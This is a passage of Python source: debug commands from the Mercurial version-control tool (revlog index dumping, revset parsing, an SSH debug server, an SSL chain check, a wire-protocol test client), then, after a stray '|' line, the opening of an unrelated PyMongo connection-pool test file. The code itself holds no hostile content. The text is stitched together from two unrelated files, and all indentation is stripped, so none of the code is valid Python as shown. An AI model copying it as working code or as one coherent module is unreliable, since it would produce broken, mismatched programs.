ui.write(('deltas against prev : ') + fmt % pcfmt(numprev, numdeltas))
if numprev > 0:
ui.write((' where prev = p1 : ') + fmt2 % pcfmt(nump1prev,
numprev))
ui.write((' where prev = p2 : ') + fmt2 % pcfmt(nump2prev,
numprev))
ui.write((' other : ') + fmt2 % pcfmt(numoprev,
numprev))
if gdelta:
ui.write(('deltas against p1 : ')
+ fmt % pcfmt(nump1, numdeltas))
ui.write(('deltas against p2 : ')
+ fmt % pcfmt(nump2, numdeltas))
ui.write(('deltas against other : ') + fmt % pcfmt(numother,
numdeltas))
@command('debugrevlogindex', cmdutil.debugrevlogopts +
[('f', 'format', 0, _('revlog format'), _('FORMAT'))],
_('[-f FORMAT] -c|-m|FILE'),
optionalrepo=True)
def debugrevlogindex(ui, repo, file_=None, **opts):
"""dump the contents of a revlog index"""
opts = pycompat.byteskwargs(opts)
r = cmdutil.openrevlog(repo, 'debugrevlogindex', file_, opts)
format = opts.get('format', 0)
if format not in (0, 1):
raise error.Abort(_("unknown format %d") % format)
if ui.debugflag:
shortfn = hex
else:
shortfn = short
# There might not be anything in r, so have a sane default
idlen = 12
for i in r:
idlen = len(shortfn(r.node(i)))
break
if format == 0:
if ui.verbose:
ui.write((" rev offset length linkrev"
" %s %s p2\n") % ("nodeid".ljust(idlen),
"p1".ljust(idlen)))
else:
ui.write((" rev linkrev %s %s p2\n") % (
"nodeid".ljust(idlen), "p1".ljust(idlen)))
elif format == 1:
if ui.verbose:
ui.write((" rev flag offset length size link p1"
" p2 %s\n") % "nodeid".rjust(idlen))
else:
ui.write((" rev flag size link p1 p2 %s\n") %
"nodeid".rjust(idlen))
for i in r:
node = r.node(i)
if format == 0:
try:
pp = r.parents(node)
except Exception:
pp = [nullid, nullid]
if ui.verbose:
ui.write("% 6d % 9d % 7d % 7d %s %s %s\n" % (
i, r.start(i), r.length(i), r.linkrev(i),
shortfn(node), shortfn(pp[0]), shortfn(pp[1])))
else:
ui.write("% 6d % 7d %s %s %s\n" % (
i, r.linkrev(i), shortfn(node), shortfn(pp[0]),
shortfn(pp[1])))
elif format == 1:
pr = r.parentrevs(i)
if ui.verbose:
ui.write("% 6d %04x % 8d % 8d % 8d % 6d % 6d % 6d %s\n" % (
i, r.flags(i), r.start(i), r.length(i), r.rawsize(i),
r.linkrev(i), pr[0], pr[1], shortfn(node)))
else:
ui.write("% 6d %04x % 8d % 6d % 6d % 6d %s\n" % (
i, r.flags(i), r.rawsize(i), r.linkrev(i), pr[0], pr[1],
shortfn(node)))
@command('debugrevspec',
[('', 'optimize', None,
_('print parsed tree after optimizing (DEPRECATED)')),
('', 'show-revs', True, _('print list of result revisions (default)')),
('s', 'show-set', None, _('print internal representation of result set')),
('p', 'show-stage', [],
_('print parsed tree at the given stage'), _('NAME')),
('', 'no-optimized', False, _('evaluate tree without optimization')),
('', 'verify-optimized', False, _('verify optimized result')),
],
('REVSPEC'))
def debugrevspec(ui, repo, expr, **opts):
"""parse and apply a revision specification
Use -p/--show-stage option to print the parsed tree at the given stages.
Use -p all to print tree at every stage.
Use --no-show-revs option with -s or -p to print only the set
representation or the parsed tree respectively.
Use --verify-optimized to compare the optimized result with the unoptimized
one. Returns 1 if the optimized result differs.
"""
opts = pycompat.byteskwargs(opts)
aliases = ui.configitems('revsetalias')
stages = [
('parsed', lambda tree: tree),
('expanded', lambda tree: revsetlang.expandaliases(tree, aliases,
ui.warn)),
('concatenated', revsetlang.foldconcat),
('analyzed', revsetlang.analyze),
('optimized', revsetlang.optimize),
]
if opts['no_optimized']:
stages = stages[:-1]
if opts['verify_optimized'] and opts['no_optimized']:
raise error.Abort(_('cannot use --verify-optimized with '
'--no-optimized'))
stagenames = set(n for n, f in stages)
showalways = set()
showchanged = set()
if ui.verbose and not opts['show_stage']:
# show parsed tree by --verbose (deprecated)
showalways.add('parsed')
showchanged.update(['expanded', 'concatenated'])
if opts['optimize']:
showalways.add('optimized')
if opts['show_stage'] and opts['optimize']:
raise error.Abort(_('cannot use --optimize with --show-stage'))
if opts['show_stage'] == ['all']:
showalways.update(stagenames)
else:
for n in opts['show_stage']:
if n not in stagenames:
raise error.Abort(_('invalid stage name: %s') % n)
showalways.update(opts['show_stage'])
treebystage = {}
printedtree = None
tree = revsetlang.parse(expr, lookup=revset.lookupfn(repo))
for n, f in stages:
treebystage[n] = tree = f(tree)
if n in showalways or (n in showchanged and tree != printedtree):
if opts['show_stage'] or n != 'parsed':
ui.write(("* %s:\n") % n)
ui.write(revsetlang.prettyformat(tree), "\n")
printedtree = tree
if opts['verify_optimized']:
arevs = revset.makematcher(treebystage['analyzed'])(repo)
brevs = revset.makematcher(treebystage['optimized'])(repo)
if opts['show_set'] or (opts['show_set'] is None and ui.verbose):
ui.write(("* analyzed set:\n"), stringutil.prettyrepr(arevs), "\n")
ui.write(("* optimized set:\n"), stringutil.prettyrepr(brevs), "\n")
arevs = list(arevs)
brevs = list(brevs)
if arevs == brevs:
return 0
ui.write(('--- analyzed\n'), label='diff.file_a')
ui.write(('+++ optimized\n'), label='diff.file_b')
sm = difflib.SequenceMatcher(None, arevs, brevs)
for tag, alo, ahi, blo, bhi in sm.get_opcodes():
if tag in ('delete', 'replace'):
for c in arevs[alo:ahi]:
ui.write('-%s\n' % c, label='diff.deleted')
if tag in ('insert', 'replace'):
for c in brevs[blo:bhi]:
ui.write('+%s\n' % c, label='diff.inserted')
if tag == 'equal':
for c in arevs[alo:ahi]:
ui.write(' %s\n' % c)
return 1
func = revset.makematcher(tree)
revs = func(repo)
if opts['show_set'] or (opts['show_set'] is None and ui.verbose):
ui.write(("* set:\n"), stringutil.prettyrepr(revs), "\n")
if not opts['show_revs']:
return
for c in revs:
ui.write("%d\n" % c)
@command('debugserve', [
('', 'sshstdio', False, _('run an SSH server bound to process handles')),
('', 'logiofd', '', _('file descriptor to log server I/O to')),
('', 'logiofile', '', _('file to log server I/O to')),
], '')
def debugserve(ui, repo, **opts):
"""run a server with advanced settings
This command is similar to :hg:`serve`. It exists partially as a
workaround to the fact that ``hg serve --stdio`` must have specific
arguments for security reasons.
"""
opts = pycompat.byteskwargs(opts)
if not opts['sshstdio']:
raise error.Abort(_('only --sshstdio is currently supported'))
logfh = None
if opts['logiofd'] and opts['logiofile']:
raise error.Abort(_('cannot use both --logiofd and --logiofile'))
if opts['logiofd']:
# Line buffered because output is line based.
try:
logfh = os.fdopen(int(opts['logiofd']), r'ab', 1)
except OSError as e:
if e.errno != errno.ESPIPE:
raise
# can't seek a pipe, so `ab` mode fails on py3
logfh = os.fdopen(int(opts['logiofd']), r'wb', 1)
elif opts['logiofile']:
logfh = open(opts['logiofile'], 'ab', 1)
s = wireprotoserver.sshserver(ui, repo, logfh=logfh)
s.serve_forever()
@command('debugsetparents', [], _('REV1 [REV2]'))
def debugsetparents(ui, repo, rev1, rev2=None):
"""manually set the parents of the current working directory
This is useful for writing repository conversion tools, but should
be used with care. For example, neither the working directory nor the
dirstate is updated, so file status may be incorrect after running this
command.
Returns 0 on success.
"""
node1 = scmutil.revsingle(repo, rev1).node()
node2 = scmutil.revsingle(repo, rev2, 'null').node()
with repo.wlock():
repo.setparents(node1, node2)
@command('debugssl', [], '[SOURCE]', optionalrepo=True)
def debugssl(ui, repo, source=None, **opts):
'''test a secure connection to a server
This builds the certificate chain for the server on Windows, installing the
missing intermediates and trusted root via Windows Update if necessary. It
does nothing on other platforms.
If SOURCE is omitted, the 'default' path will be used. If a URL is given,
that server is used. See :hg:`help urls` for more information.
If the update succeeds, retry the original operation. Otherwise, the cause
of the SSL error is likely another issue.
'''
if not pycompat.iswindows:
raise error.Abort(_('certificate chain building is only possible on '
'Windows'))
if not source:
if not repo:
raise error.Abort(_("there is no Mercurial repository here, and no "
"server specified"))
source = "default"
source, branches = hg.parseurl(ui.expandpath(source))
url = util.url(source)
addr = None
defaultport = {'https': 443, 'ssh': 22}
if url.scheme in defaultport:
try:
addr = (url.host, int(url.port or defaultport[url.scheme]))
except ValueError:
raise error.Abort(_("malformed port number in URL"))
else:
raise error.Abort(_("only https and ssh connections are supported"))
from . import win32
s = ssl.wrap_socket(socket.socket(), ssl_version=ssl.PROTOCOL_TLS,
cert_reqs=ssl.CERT_NONE, ca_certs=None)
try:
s.connect(addr)
cert = s.getpeercert(True)
ui.status(_('checking the certificate chain for %s\n') % url.host)
complete = win32.checkcertificatechain(cert, build=False)
if not complete:
ui.status(_('certificate chain is incomplete, updating... '))
if not win32.checkcertificatechain(cert):
ui.status(_('failed.\n'))
else:
ui.status(_('done.\n'))
else:
ui.status(_('full certificate chain is available\n'))
finally:
s.close()
@command('debugsub',
[('r', 'rev', '',
_('revision to check'), _('REV'))],
_('[-r REV] [REV]'))
def debugsub(ui, repo, rev=None):
ctx = scmutil.revsingle(repo, rev, None)
for k, v in sorted(ctx.substate.items()):
ui.write(('path %s\n') % k)
ui.write((' source %s\n') % v[0])
ui.write((' revision %s\n') % v[1])
@command('debugsuccessorssets',
[('', 'closest', False, _('return closest successors sets only'))],
_('[REV]'))
def debugsuccessorssets(ui, repo, *revs, **opts):
"""show set of successors for revision
A successors set of changeset A is a consistent group of revisions that
succeed A. It contains non-obsolete changesets only unless closests
successors set is set.
In most cases a changeset A has a single successors set containing a single
successor (changeset A replaced by A').
A changeset that is made obsolete with no successors are called "pruned".
Such changesets have no successors sets at all.
A changeset that has been "split" will have a successors set containing
more than one successor.
A changeset that has been rewritten in multiple different ways is called
"divergent". Such changesets have multiple successor sets (each of which
may also be split, i.e. have multiple successors).
Results are displayed as follows::
<rev1>
<successors-1A>
<rev2>
<successors-2A>
<successors-2B1> <successors-2B2> <successors-2B3>
Here rev2 has two possible (i.e. divergent) successors sets. The first
holds one element, whereas the second holds three (i.e. the changeset has
been split).
"""
# passed to successorssets caching computation from one call to another
cache = {}
ctx2str = bytes
node2str = short
for rev in scmutil.revrange(repo, revs):
ctx = repo[rev]
ui.write('%s\n'% ctx2str(ctx))
for succsset in obsutil.successorssets(repo, ctx.node(),
closest=opts[r'closest'],
cache=cache):
if succsset:
ui.write(' ')
ui.write(node2str(succsset[0]))
for node in succsset[1:]:
ui.write(' ')
ui.write(node2str(node))
ui.write('\n')
@command('debugtemplate',
[('r', 'rev', [], _('apply template on changesets'), _('REV')),
('D', 'define', [], _('define template keyword'), _('KEY=VALUE'))],
_('[-r REV]... [-D KEY=VALUE]... TEMPLATE'),
optionalrepo=True)
def debugtemplate(ui, repo, tmpl, **opts):
"""parse and apply a template
If -r/--rev is given, the template is processed as a log template and
applied to the given changesets. Otherwise, it is processed as a generic
template.
Use --verbose to print the parsed tree.
"""
revs = None
if opts[r'rev']:
if repo is None:
raise error.RepoError(_('there is no Mercurial repository here '
'(.hg not found)'))
revs = scmutil.revrange(repo, opts[r'rev'])
props = {}
for d in opts[r'define']:
try:
k, v = (e.strip() for e in d.split('=', 1))
if not k or k == 'ui':
raise ValueError
props[k] = v
except ValueError:
raise error.Abort(_('malformed keyword definition: %s') % d)
if ui.verbose:
aliases = ui.configitems('templatealias')
tree = templater.parse(tmpl)
ui.note(templater.prettyformat(tree), '\n')
newtree = templater.expandaliases(tree, aliases)
if newtree != tree:
ui.note(("* expanded:\n"), templater.prettyformat(newtree), '\n')
if revs is None:
tres = formatter.templateresources(ui, repo)
t = formatter.maketemplater(ui, tmpl, resources=tres)
if ui.verbose:
kwds, funcs = t.symbolsuseddefault()
ui.write(("* keywords: %s\n") % ', '.join(sorted(kwds)))
ui.write(("* functions: %s\n") % ', '.join(sorted(funcs)))
ui.write(t.renderdefault(props))
else:
displayer = logcmdutil.maketemplater(ui, repo, tmpl)
if ui.verbose:
kwds, funcs = displayer.t.symbolsuseddefault()
ui.write(("* keywords: %s\n") % ', '.join(sorted(kwds)))
ui.write(("* functions: %s\n") % ', '.join(sorted(funcs)))
for r in revs:
displayer.show(repo[r], **pycompat.strkwargs(props))
displayer.close()
@command('debuguigetpass', [
('p', 'prompt', '', _('prompt text'), _('TEXT')),
], _('[-p TEXT]'), norepo=True)
def debuguigetpass(ui, prompt=''):
"""show prompt to type password"""
r = ui.getpass(prompt)
ui.write(('respose: %s\n') % r)
@command('debuguiprompt', [
('p', 'prompt', '', _('prompt text'), _('TEXT')),
], _('[-p TEXT]'), norepo=True)
def debuguiprompt(ui, prompt=''):
"""show plain prompt"""
r = ui.prompt(prompt)
ui.write(('response: %s\n') % r)
@command('debugupdatecaches', [])
def debugupdatecaches(ui, repo, *pats, **opts):
"""warm all known caches in the repository"""
with repo.wlock(), repo.lock():
repo.updatecaches(full=True)
@command('debugupgraderepo', [
('o', 'optimize', [], _('extra optimization to perform'), _('NAME')),
('', 'run', False, _('performs an upgrade')),
])
def debugupgraderepo(ui, repo, run=False, optimize=None):
"""upgrade a repository to use different features
If no arguments are specified, the repository is evaluated for upgrade
and a list of problems and potential optimizations is printed.
With ``--run``, a repository upgrade is performed. Behavior of the upgrade
can be influenced via additional arguments. More details will be provided
by the command output when run without ``--run``.
During the upgrade, the repository will be locked and no writes will be
allowed.
At the end of the upgrade, the repository may not be readable while new
repository data is swapped in. This window will be as long as it takes to
rename some directories inside the ``.hg`` directory. On most machines, this
should complete almost instantaneously and the chances of a consumer being
unable to access the repository should be low.
"""
return upgrade.upgraderepo(ui, repo, run=run, optimize=optimize)
@command('debugwalk', cmdutil.walkopts, _('[OPTION]... [FILE]...'),
inferrepo=True)
def debugwalk(ui, repo, *pats, **opts):
"""show how files match on given patterns"""
opts = pycompat.byteskwargs(opts)
m = scmutil.match(repo[None], pats, opts)
if ui.verbose:
ui.write(('* matcher:\n'), stringutil.prettyrepr(m), '\n')
items = list(repo[None].walk(m))
if not items:
return
f = lambda fn: fn
if ui.configbool('ui', 'slash') and pycompat.ossep != '/':
f = lambda fn: util.normpath(fn)
fmt = 'f %%-%ds %%-%ds %%s' % (
max([len(abs) for abs in items]),
max([len(m.rel(abs)) for abs in items]))
for abs in items:
line = fmt % (abs, f(m.rel(abs)), m.exact(abs) and 'exact' or '')
ui.write("%s\n" % line.rstrip())
@command('debugwhyunstable', [], _('REV'))
def debugwhyunstable(ui, repo, rev):
"""explain instabilities of a changeset"""
for entry in obsutil.whyunstable(repo, scmutil.revsingle(repo, rev)):
dnodes = ''
if entry.get('divergentnodes'):
dnodes = ' '.join('%s (%s)' % (ctx.hex(), ctx.phasestr())
for ctx in entry['divergentnodes']) + ' '
ui.write('%s: %s%s %s\n' % (entry['instability'], dnodes,
entry['reason'], entry['node']))
@command('debugwireargs',
[('', 'three', '', 'three'),
('', 'four', '', 'four'),
('', 'five', '', 'five'),
] + cmdutil.remoteopts,
_('REPO [OPTIONS]... [ONE [TWO]]'),
norepo=True)
def debugwireargs(ui, repopath, *vals, **opts):
opts = pycompat.byteskwargs(opts)
repo = hg.peer(ui, opts, repopath)
for opt in cmdutil.remoteopts:
del opts[opt[1]]
args = {}
for k, v in opts.iteritems():
if v:
args[k] = v
args = pycompat.strkwargs(args)
# run twice to check that we don't mess up the stream for the next command
res1 = repo.debugwireargs(*vals, **args)
res2 = repo.debugwireargs(*vals, **args)
ui.write("%s\n" % res1)
if res1 != res2:
ui.warn("%s\n" % res2)
def _parsewirelangblocks(fh):
activeaction = None
blocklines = []
lastindent = 0
for line in fh:
line = line.rstrip()
if not line:
continue
if line.startswith(b'#'):
continue
if not line.startswith(b' '):
# New block. Flush previous one.
if activeaction:
yield activeaction, blocklines
activeaction = line
blocklines = []
lastindent = 0
continue
# Else we start with an indent.
if not activeaction:
raise error.Abort(_('indented line outside of block'))
indent = len(line) - len(line.lstrip())
# If this line is indented more than the last line, concatenate it.
if indent > lastindent and blocklines:
blocklines[-1] += line.lstrip()
else:
blocklines.append(line)
lastindent = indent
# Flush last block.
if activeaction:
yield activeaction, blocklines
@command('debugwireproto',
[
('', 'localssh', False, _('start an SSH server for this repo')),
('', 'peer', '', _('construct a specific version of the peer')),
('', 'noreadstderr', False, _('do not read from stderr of the remote')),
('', 'nologhandshake', False,
_('do not log I/O related to the peer handshake')),
] + cmdutil.remoteopts,
_('[PATH]'),
optionalrepo=True)
def debugwireproto(ui, repo, path=None, **opts):
"""send wire protocol commands to a server
This command can be used to issue wire protocol commands to remote
peers and to debug the raw data being exchanged.
``--localssh`` will start an SSH server against the current repository
and connect to that. By default, the connection will perform a handshake
and establish an appropriate peer instance.
``--peer`` can be used to bypass the handshake protocol and construct a
peer instance using the specified class type. Valid values are ``raw``,
``http2``, ``ssh1``, and ``ssh2``. ``raw`` instances only allow sending
raw data payloads and don't support higher-level command actions.
``--noreadstderr`` can be used to disable automatic reading from stderr
of the peer (for SSH connections only). Disabling automatic reading of
stderr is useful for making output more deterministic.
Commands are issued via a mini language which is specified via stdin.
The language consists of individual actions to perform. An action is
defined by a block. A block is defined as a line with no leading
space followed by 0 or more lines with leading space. Blocks are
effectively a high-level command with additional metadata.
Lines beginning with ``#`` are ignored.
The following sections denote available actions.
raw
---
Send raw data to the server.
The block payload contains the raw data to send as one atomic send
operation. The data may not actually be delivered in a single system
call: it depends on the abilities of the transport being used.
Each line in the block is de-indented and concatenated. Then, that
value is evaluated as a Python b'' literal. This allows the use of
backslash escaping, etc.
raw+
----
Behaves like ``raw`` except flushes output afterwards.
command <X>
-----------
Send a request to run a named command, whose name follows the ``command``
string.
Arguments to the command are defined as lines in this block. The format of
each line is ``<key> <value>``. e.g.::
command listkeys
namespace bookmarks
If the value begins with ``eval:``, it will be interpreted as a Python
literal expression. Otherwise values are interpreted as Python b'' literals.
This allows sending complex types and encoding special byte sequences via
backslash escaping.
The following arguments have special meaning:
``PUSHFILE``
When defined, the *push* mechanism of the peer will be used instead
of the static request-response mechanism and the content of the
file specified in the value of this argument will be sent as the
command payload.
This can be used to submit a local bundle file to the remote.
batchbegin
----------
Instruct the peer to begin a batched send.
All ``command`` blocks are queued for execution until the next
``batchsubmit`` block.
batchsubmit
-----------
Submit previously queued ``command`` blocks as a batch request.
This action MUST be paired with a ``batchbegin`` action.
httprequest <method> <path>
---------------------------
(HTTP peer only)
Send an HTTP request to the peer.
The HTTP request line follows the ``httprequest`` action. e.g. ``GET /foo``.
Arguments of the form ``<key>: <value>`` are interpreted as HTTP request
headers to add to the request. e.g. ``Accept: foo``.
The following arguments are special:
``BODYFILE``
The content of the file defined as the value to this argument will be
transferred verbatim as the HTTP request body.
``frame <type> <flags> <payload>``
Send a unified protocol frame as part of the request body.
All frames will be collected and sent as the body to the HTTP
request.
close
-----
Close the connection to the server.
flush
-----
Flush data written to the server.
readavailable
-------------
Close the write end of the connection and read all available data from
the server.
If the connection to the server encompasses multiple pipes, we poll both
pipes and read available data.
readline
--------
Read a line of output from the server. If there are multiple output
pipes, reads only the main pipe.
ereadline
---------
Like ``readline``, but read from the stderr pipe, if available.
read <X>
--------
``read()`` N bytes from the server's main output pipe.
eread <X>
---------
``read()`` N bytes from the server's stderr pipe, if available.
Specifying Unified Frame-Based Protocol Frames
----------------------------------------------
It is possible to emit a *Unified Frame-Based Protocol* by using special
syntax.
A frame is composed as a type, flags, and payload. These can be parsed
from a string of the form:
<request-id> <stream-id> <stream-flags> <type> <flags> <payload>
``request-id`` and ``stream-id`` are integers defining the request and
stream identifiers.
``type`` can be an integer value for the frame type or the string name
of the type. The strings are defined in ``wireprotoframing.py``. e.g.
``command-name``.
``stream-flags`` and ``flags`` are a ``|`` delimited list of flag
components. Each component (and there can be just one) can be an integer
or a flag name for stream flags or frame flags, respectively. Values are
resolved to integers and then bitwise OR'd together.
``payload`` represents the raw frame payload. If it begins with
``cbor:``, the following string is evaluated as Python code and the
resulting object is fed into a CBOR encoder. Otherwise it is interpreted
as a Python byte string literal.
"""
opts = pycompat.byteskwargs(opts)
if opts['localssh'] and not repo:
raise error.Abort(_('--localssh requires a repository'))
if opts['peer'] and opts['peer'] not in ('raw', 'http2', 'ssh1', 'ssh2'):
raise error.Abort(_('invalid value for --peer'),
hint=_('valid values are "raw", "ssh1", and "ssh2"'))
if path and opts['localssh']:
raise error.Abort(_('cannot specify --localssh with an explicit '
'path'))
if ui.interactive():
ui.write(_('(waiting for commands on stdin)\n'))
blocks = list(_parsewirelangblocks(ui.fin))
proc = None
stdin = None
stdout = None
stderr = None
opener = None
if opts['localssh']:
# We start the SSH server in its own process so there is process
# separation. This prevents a whole class of potential bugs around
# shared state from interfering with server operation.
args = procutil.hgcmd() + [
'-R', repo.root,
'debugserve', '--sshstdio',
]
proc = subprocess.Popen(pycompat.rapply(procutil.tonativestr, args),
stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
bufsize=0)
stdin = proc.stdin
stdout = proc.stdout
stderr = proc.stderr
# We turn the pipes into observers so we can log I/O.
if ui.verbose or opts['peer'] == 'raw':
stdin = util.makeloggingfileobject(ui, proc.stdin, b'i',
logdata=True)
stdout = util.makeloggingfileobject(ui, proc.stdout, b'o',
logdata=True)
stderr = util.makeloggingfileobject(ui, proc.stderr, b'e',
logdata=True)
# --localssh also implies the peer connection settings.
url = 'ssh://localserver'
autoreadstderr = not opts['noreadstderr']
if opts['peer'] == 'ssh1':
ui.write(_('creating ssh peer for wire protocol version 1\n'))
peer = sshpeer.sshv1peer(ui, url, proc, stdin, stdout, stderr,
None, autoreadstderr=autoreadstderr)
elif opts['peer'] == 'ssh2':
ui.write(_('creating ssh peer for wire protocol version 2\n'))
peer = sshpeer.sshv2peer(ui, url, proc, stdin, stdout, stderr,
None, autoreadstderr=autoreadstderr)
elif opts['peer'] == 'raw':
ui.write(_('using raw connection to peer\n'))
peer = None
else:
ui.write(_('creating ssh peer from handshake results\n'))
peer = sshpeer.makepeer(ui, url, proc, stdin, stdout, stderr,
autoreadstderr=autoreadstderr)
elif path:
# We bypass hg.peer() so we can proxy the sockets.
# TODO consider not doing this because we skip
# ``hg.wirepeersetupfuncs`` and potentially other useful functionality.
u = util.url(path)
if u.scheme != 'http':
raise error.Abort(_('only http:// paths are currently supported'))
url, authinfo = u.authinfo()
openerargs = {
r'useragent': b'Mercurial debugwireproto',
}
# Turn pipes/sockets into observers so we can log I/O.
if ui.verbose:
openerargs.update({
r'loggingfh': ui,
r'loggingname': b's',
r'loggingopts': {
r'logdata': True,
r'logdataapis': False,
},
})
if ui.debugflag:
openerargs[r'loggingopts'][r'logdataapis'] = True
# Don't send default headers when in raw mode. This allows us to
# bypass most of the behavior of our URL handling code so we can
# have near complete control over what's sent on the wire.
if opts['peer'] == 'raw':
openerargs[r'sendaccept'] = False
opener = urlmod.opener(ui, authinfo, **openerargs)
if opts['peer'] == 'http2':
ui.write(_('creating http peer for wire protocol version 2\n'))
# We go through makepeer() because we need an API descriptor for
# the peer instance to be useful.
with ui.configoverride({
('experimental', 'httppeer.advertise-v2'): True}):
if opts['nologhandshake']:
ui.pushbuffer()
peer = httppeer.makepeer(ui, path, opener=opener)
if opts['nologhandshake']:
ui.popbuffer()
if not isinstance(peer, httppeer.httpv2peer):
raise error.Abort(_('could not instantiate HTTP peer for '
'wire protocol version 2'),
hint=_('the server may not have the feature '
'enabled or is not allowing this '
'client version'))
elif opts['peer'] == 'raw':
ui.write(_('using raw connection to peer\n'))
peer = None
elif opts['peer']:
raise error.Abort(_('--peer %s not supported with HTTP peers') %
opts['peer'])
else:
peer = httppeer.makepeer(ui, path, opener=opener)
# We /could/ populate stdin/stdout with sock.makefile()...
else:
raise error.Abort(_('unsupported connection configuration'))
batchedcommands = None
# Now perform actions based on the parsed wire language instructions.
for action, lines in blocks:
if action in ('raw', 'raw+'):
if not stdin:
raise error.Abort(_('cannot call raw/raw+ on this peer'))
# Concatenate the data together.
data = ''.join(l.lstrip() for l in lines)
data = stringutil.unescapestr(data)
stdin.write(data)
if action == 'raw+':
stdin.flush()
elif action == 'flush':
if not stdin:
raise error.Abort(_('cannot call flush on this peer'))
stdin.flush()
elif action.startswith('command'):
if not peer:
raise error.Abort(_('cannot send commands unless peer instance '
'is available'))
command = action.split(' ', 1)[1]
args = {}
for line in lines:
# We need to allow empty values.
fields = line.lstrip().split(' ', 1)
if len(fields) == 1:
key = fields[0]
value = ''
else:
key, value = fields
if value.startswith('eval:'):
value = stringutil.evalpythonliteral(value[5:])
else:
value = stringutil.unescapestr(value)
args[key] = value
if batchedcommands is not None:
batchedcommands.append((command, args))
continue
ui.status(_('sending %s command\n') % command)
if 'PUSHFILE' in args:
with open(args['PUSHFILE'], r'rb') as fh:
del args['PUSHFILE']
res, output = peer._callpush(command, fh,
**pycompat.strkwargs(args))
ui.status(_('result: %s\n') % stringutil.escapestr(res))
ui.status(_('remote output: %s\n') %
stringutil.escapestr(output))
else:
with peer.commandexecutor() as e:
res = e.callcommand(command, args).result()
if isinstance(res, wireprotov2peer.commandresponse):
val = res.objects()
ui.status(_('response: %s\n') %
stringutil.pprint(val, bprefix=True, indent=2))
else:
ui.status(_('response: %s\n') %
stringutil.pprint(res, bprefix=True, indent=2))
elif action == 'batchbegin':
if batchedcommands is not None:
raise error.Abort(_('nested batchbegin not allowed'))
batchedcommands = []
elif action == 'batchsubmit':
# There is a batching API we could go through. But it would be
# difficult to normalize requests into function calls. It is easier
# to bypass this layer and normalize to commands + args.
ui.status(_('sending batch with %d sub-commands\n') %
len(batchedcommands))
for i, chunk in enumerate(peer._submitbatch(batchedcommands)):
ui.status(_('response #%d: %s\n') %
(i, stringutil.escapestr(chunk)))
batchedcommands = None
elif action.startswith('httprequest '):
if not opener:
raise error.Abort(_('cannot use httprequest without an HTTP '
'peer'))
request = action.split(' ', 2)
if len(request) != 3:
raise error.Abort(_('invalid httprequest: expected format is '
'"httprequest <method> <path>'))
method, httppath = request[1:]
headers = {}
body = None
frames = []
for line in lines:
line = line.lstrip()
m = re.match(b'^([a-zA-Z0-9_-]+): (.*)$', line)
if m:
# Headers need to use native strings.
key = pycompat.strurl(m.group(1))
value = pycompat.strurl(m.group(2))
headers[key] = value
continue
if line.startswith(b'BODYFILE '):
with open(line.split(b' ', 1), 'rb') as fh:
body = fh.read()
elif line.startswith(b'frame '):
frame = wireprotoframing.makeframefromhumanstring(
line[len(b'frame '):])
frames.append(frame)
else:
raise error.Abort(_('unknown argument to httprequest: %s') %
line)
url = path + httppath
if frames:
body = b''.join(bytes(f) for f in frames)
req = urlmod.urlreq.request(pycompat.strurl(url), body, headers)
# urllib.Request insists on using has_data() as a proxy for
# determining the request method. Override that to use our
# explicitly requested method.
req.get_method = lambda: pycompat.sysstr(method)
try:
res = opener.open(req)
body = res.read()
except util.urlerr.urlerror as e:
# read() method must be called, but only exists in Python 2
getattr(e, 'read', lambda: None)()
continue
ct = res.headers.get(r'Content-Type')
if ct == r'application/mercurial-cbor':
ui.write(_('cbor> %s\n') %
stringutil.pprint(cborutil.decodeall(body),
bprefix=True,
indent=2))
elif action == 'close':
peer.close()
elif action == 'readavailable':
if not stdout or not stderr:
raise error.Abort(_('readavailable not available on this peer'))
stdin.close()
stdout.read()
stderr.read()
elif action == 'readline':
if not stdout:
raise error.Abort(_('readline not available on this peer'))
stdout.readline()
elif action == 'ereadline':
if not stderr:
raise error.Abort(_('ereadline not available on this peer'))
stderr.readline()
elif action.startswith('read '):
count = int(action.split(' ', 1)[1])
if not stdout:
raise error.Abort(_('read not available on this peer'))
stdout.read(count)
elif action.startswith('eread '):
count = int(action.split(' ', 1)[1])
if not stderr:
raise error.Abort(_('eread not available on this peer'))
stderr.read(count)
else:
raise error.Abort(_('unknown action: %s') % action)
if batchedcommands is not None:
raise error.Abort(_('unclosed "batchbegin" request'))
if peer:
peer.close()
if proc:
proc.kill()
|
# Copyright 2019-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Execute Transactions Spec tests."""
import os
import sys
import threading
import time
sys.path[0:0] = [""]
from test import IntegrationTest, client_knobs, unittest
from test.pymongo_mocks import DummyMonitor
from test.utils import (
CMAPListener,
OvertCommandListener,
TestCreator,
camel_to_snake,
client_context,
get_pool,
get_pools,
rs_or_single_client,
single_client,
single_client_noauth,
wait_until,
)
from test.utils_spec_runner import SpecRunnerThread
from bson.objectid import ObjectId
from bson.son import SON
from pymongo.errors import ConnectionFailure, OperationFailure, PyMongoError
from pymongo.monitoring import (
ConnectionCheckedInEvent,
ConnectionCheckedOutEvent,
ConnectionCheckOutFailedEvent,
ConnectionCheckOutFailedReason,
ConnectionCheckOutStartedEvent,
ConnectionClosedEvent,
ConnectionClosedReason,
ConnectionCreatedEvent,
ConnectionReadyEvent,
PoolClearedEvent,
PoolClosedEvent,
PoolCreatedEvent,
PoolReadyEvent,
)
from pymongo.pool import PoolState, _PoolClosedError
from pymongo.read_preferences import ReadPreference
from pymongo.topology_description import updated_topology_description
OBJECT_TYPES = {
# Event types.
"ConnectionCheckedIn": ConnectionCheckedInEvent,
"ConnectionCheckedOut": ConnectionCheckedOutEvent,
"ConnectionCheckOutFailed": ConnectionCheckOutFailedEvent,
"ConnectionClosed": ConnectionClosedEvent,
"ConnectionCreated": ConnectionCreatedEvent,
"ConnectionReady": ConnectionReadyEvent,
"ConnectionCheckOutStarted": ConnectionCheckOutStartedEvent,
"ConnectionPoolCreated": PoolCreatedEvent,
"ConnectionPoolReady": PoolReadyEvent,
"ConnectionPoolCleared": PoolClearedEvent,
"ConnectionPoolClosed": PoolClosedEvent,
# Error types.
"PoolClosedError": _PoolClosedError,
"WaitQueueTimeoutError": ConnectionFailure,
}
class TestCMAP(IntegrationTest):
# Location of JSON test specifications.
